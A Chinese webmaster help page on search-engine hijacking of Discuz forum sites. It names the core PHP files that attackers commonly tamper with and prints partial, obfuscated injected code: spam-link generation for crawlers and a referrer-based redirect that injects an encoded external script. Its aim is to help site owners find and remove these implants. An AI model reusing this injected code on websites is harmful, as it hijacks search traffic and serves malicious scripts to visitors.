多语言展示
当前在线:953今日阅读:84今日分享:32

[劫持解决] 搜索引擎劫持常篡改的文件有哪些?

网站被挂马。如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时,可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此,特么的被人阴了……可信度降低。你苦心经营网站多年,树立口碑不容易。一日被黑,日日被劫持。从此以后用户通过搜索引擎打开你的网站不是色情就是赌博。正常业务啥都没了,也别再谈什么可信度和口碑了。站长们怎么找到劫持篡改的文件呢?
DZ搜索引擎劫持常被反复篡改的文件

function_core.php、discuz_application.php、class_core.php、config_global.php;class_core.php文件反复被挂马什么原因?一会是class_core.php被修改,一会是config_global.php被修改。class_core.php常被插入劫持header以上部分代码,查看源码看不到任何信息,只能抓取诊断看到。

class_core.php被插入木马代码

防止被恶意使用,仅附上部分代码error_reporting(0);$S9 = explode('|',base64_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg=='));$S22 = ($_GET['id'] > 1000000 || $_GET['tid'] > 1000000 || $_GET['aid'] > 10function PostLinks(){ $S27 = array(); $S27[]= 'https://'.$_SERVER['HTTP_HOST'].'/archives/'.date('Ymd').'/'.date('Hi').'/index.html'; return base64_encode(implode('|', $S27));}define('APP_JACK_DOCUMENTROOT',$_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6174746163686D656E742F666F72756D2F323F30372F'));主要是判断生成链接,加入链接牵引搜索引擎爬取。

config_global.php也会使用上面的方式或跳转方式

跳转代码如下:$_config['cache']['type'] = '';function call_diy_jump(){ $jump_ref  = explode('|','baidu.|haoso.|haosou.|bing.|google.|sogou.|so.'); $ref = strtolower($_SERVER['HTTP_REFERER']); $jccode='PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcml wdCIgc3JjPSJodHRwczovL2NvdW50Ny41MXllcy5vcmc vY2xpY2suYXNweD9pZD03MjM3MDYwMiZsb2dvPTEyIiB jaGFyc2V0PSJnYjIzMTIiPjwvc2NyaXB0Pg=='; $S22 = ($_GET['id'] > 1000000 || $_GET['tid'] > 9000000 || $_GET['aid'] > 3000000 || (stristr($_SERVER['QUERY_STRING'],'/')call_diy_jump();劫持搜索引擎实现页面跳转。

推荐信息